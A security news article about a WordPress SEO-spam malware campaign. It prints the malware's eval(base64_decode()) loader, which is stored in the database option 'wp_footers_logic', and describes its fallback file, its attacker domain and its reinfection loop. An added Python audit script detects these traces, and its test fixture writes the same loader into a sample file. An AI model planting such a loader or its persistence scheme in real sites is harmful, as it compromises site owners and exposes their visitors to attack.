Cybercriminals Exploit Website Vulnerabilities to Boost Malicious SEO Rankings
In a concerning trend, cybercriminals are increasingly compromising websites to inject malicious links, aiming to enhance their search engine optimization (SEO) rankings through blackhat tactics. This campaign predominantly focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.
Exploitation of WordPress Vulnerabilities
Attackers are exploiting vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly targeting international markets where gambling remains heavily regulated. By hijacking legitimate website pages, they create duplicate directories with identical names, effectively replacing original content with spam-filled landing pages. This technique exploits how Apache and Nginx web servers resolve filesystem paths before handing requests to WordPress rewrite engines.
Advanced Malware Techniques
Sucuri security researchers have identified a sophisticated variant of this malware that incorporates multiple layers of redundancy. The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered. Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.
Multi-Layered Infection Mechanism
The infection operates through clever database manipulation and dynamic content fetching. Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file. The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP’s eval() function:
```php
// Loader appended to the end of the theme's functions.php (malicious code as described above).
// The payload lives in wp_options under the innocuous-looking name wp_footers_logic.
$cloak = get_option('wp_footers_logic');
if ($cloak) {
    // Decode the stored payload and execute it in the context of every page load.
    $decoded = base64_decode($cloak);
    eval($decoded);
}
```
If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths, checking for cached spam content. When triggered, it fetches content from attacker-controlled domains like browsec[.]xyz. To ensure persistence, attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers. If the markers are missing, the code automatically reappends the malicious payload to both the theme’s functions.php file and the primary file of the first active plugin, a reinfection loop that makes partial cleanups ineffective.
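The following audit script is an added example written for this article; it is not code from the article or from Sucuri. It checks the places the write-up names: theme and plugin PHP files for an eval() plus base64_decode() loader (or a get_option() call on wp_footers_logic), wp_options rows for the option name or any value that base64-decodes to PHP, the wp-content/cache/style.dat fallback file, and top-level directories outside the three stock WordPress directories, which Apache or Nginx would serve from disk before WordPress's rewrite rules run. The stock-layout assumption, the option-row format (pairs of option_name and option_value, as in `wp option list --format=json` output) and the infected fixture it builds in a temporary directory are all constructed for the example.

```python
"""Audit a WordPress document root for the SEO-spam loader pattern described above.
Added example, not from the article or Sucuri; paths assume a stock WordPress layout."""
import base64
import json
import re
import tempfile
from pathlib import Path

OPTION_NAME = "wp_footers_logic"                  # option name named in the write-up
FALLBACK_FILE = "wp-content/cache/style.dat"      # eval()-disabled fallback named in the write-up
CORE_DIRS = {"wp-admin", "wp-content", "wp-includes"}  # assumption: stock install has only these

EVAL_RE = re.compile(r"\beval\s*\(", re.I)
B64_RE = re.compile(r"\bbase64_decode\s*\(", re.I)
OPTION_RE = re.compile(r"get_option\s*\(\s*['\"]%s['\"]" % re.escape(OPTION_NAME))


def scan_php_files(wp_root):
    """Relative paths of theme/plugin PHP files containing the loader pattern:
    eval() together with base64_decode(), or get_option() on the known option name."""
    root = Path(wp_root)
    hits = []
    for sub in ("wp-content/themes", "wp-content/plugins"):
        base = root / sub
        if not base.is_dir():
            continue
        for path in base.rglob("*.php"):
            text = path.read_text(errors="ignore")
            if OPTION_RE.search(text) or (EVAL_RE.search(text) and B64_RE.search(text)):
                hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def check_fallback_file(wp_root):
    """True if the fallback payload file exists on disk."""
    return (Path(wp_root) / FALLBACK_FILE).is_file()


def find_rogue_dirs(wp_root):
    """Top-level directories that are not part of a stock install. A directory named
    like a page slug is served straight from disk, ahead of WordPress permalinks."""
    root = Path(wp_root)
    return sorted(p.name for p in root.iterdir() if p.is_dir() and p.name not in CORE_DIRS)


def suspicious_options(option_rows):
    """option_rows: iterable of (option_name, option_value). Flags the known option
    name and any value that base64-decodes to text containing PHP code."""
    flagged = []
    for name, value in option_rows:
        if name == OPTION_NAME:
            flagged.append(name)
            continue
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8", "ignore")
        except (ValueError, TypeError):
            continue  # not base64: ordinary setting, serialized array, URL, etc.
        if re.search(r"<\?php|\beval\s*\(", decoded):
            flagged.append(name)
    return flagged


def audit(wp_root, option_rows=()):
    """Run all checks and return one report dict."""
    return {
        "loader_files": scan_php_files(wp_root),
        "fallback_file_present": check_fallback_file(wp_root),
        "rogue_dirs": find_rogue_dirs(wp_root),
        "suspicious_options": suspicious_options(option_rows),
    }


def build_sample_site(root):
    """Construct a minimal infected fixture (sample data, not a real site): the loader
    from the write-up at the bottom of a theme's functions.php, a benign plugin, the
    fallback file, and a rogue 'about-us' directory shadowing a page slug."""
    root = Path(root)
    for d in CORE_DIRS:
        (root / d).mkdir(parents=True, exist_ok=True)
    theme = root / "wp-content/themes/sample-theme"
    theme.mkdir(parents=True)
    (theme / "functions.php").write_text(
        "<?php\nfunction sample_setup() {}\n"
        "$cloak = get_option('wp_footers_logic');\n"
        "if ($cloak) {\n    $decoded = base64_decode($cloak);\n    eval($decoded);\n}\n"
    )
    plugin = root / "wp-content/plugins/clean-plugin"
    plugin.mkdir(parents=True)
    (plugin / "clean-plugin.php").write_text("<?php\n// benign plugin, no loader\n")
    (root / "wp-content/cache").mkdir(parents=True, exist_ok=True)
    (root / FALLBACK_FILE).write_text("<?php /* fallback payload placeholder */\n")
    (root / "about-us").mkdir()
    (root / "about-us/index.php").write_text("<?php /* spam landing page placeholder */\n")
    return root


SAMPLE_OPTIONS = [  # constructed wp_options rows: two normal, one known name, one disguised
    ("siteurl", "https://example.invalid"),
    ("blog_public", "1"),
    ("wp_footers_logic", base64.b64encode(b"<?php echo 'x';").decode()),
    ("theme_cache", base64.b64encode(b"<?php eval('1');").decode()),
]


def demo_report():
    """Build the fixture in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_site(tmp), SAMPLE_OPTIONS)


if __name__ == "__main__":
    print(json.dumps(demo_report(), indent=2))
```

On a live site, point audit() at the document root and feed it the option rows exported from the database; a non-empty loader_files list, a present fallback file, or a flagged option is a signal to treat the install as compromised and to check the first active plugin's main file as well as the theme, since the reinfection code rewrites both.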
Implications and Recommendations
The implications of such attacks are far-reaching. Compromised websites not only suffer from degraded SEO rankings but also risk being blacklisted by search engines, leading to a significant loss of traffic and credibility. Moreover, visitors to these sites may be redirected to malicious content, exposing them to potential security threats.
To mitigate these risks, website administrators are advised to:
– Regularly Update Software: Ensure that all website components, including WordPress core, themes, and plugins, are up to date to patch known vulnerabilities.
– Implement Strong Security Measures: Utilize security plugins and firewalls to detect and prevent unauthorized access.
– Conduct Routine Security Audits: Regularly scan the website for signs of compromise and unauthorized changes.
– Educate Users: Inform users about the risks of clicking on suspicious links and the importance of verifying website authenticity.
By adopting these practices, website owners can enhance their defenses against such malicious SEO campaigns and protect their online presence.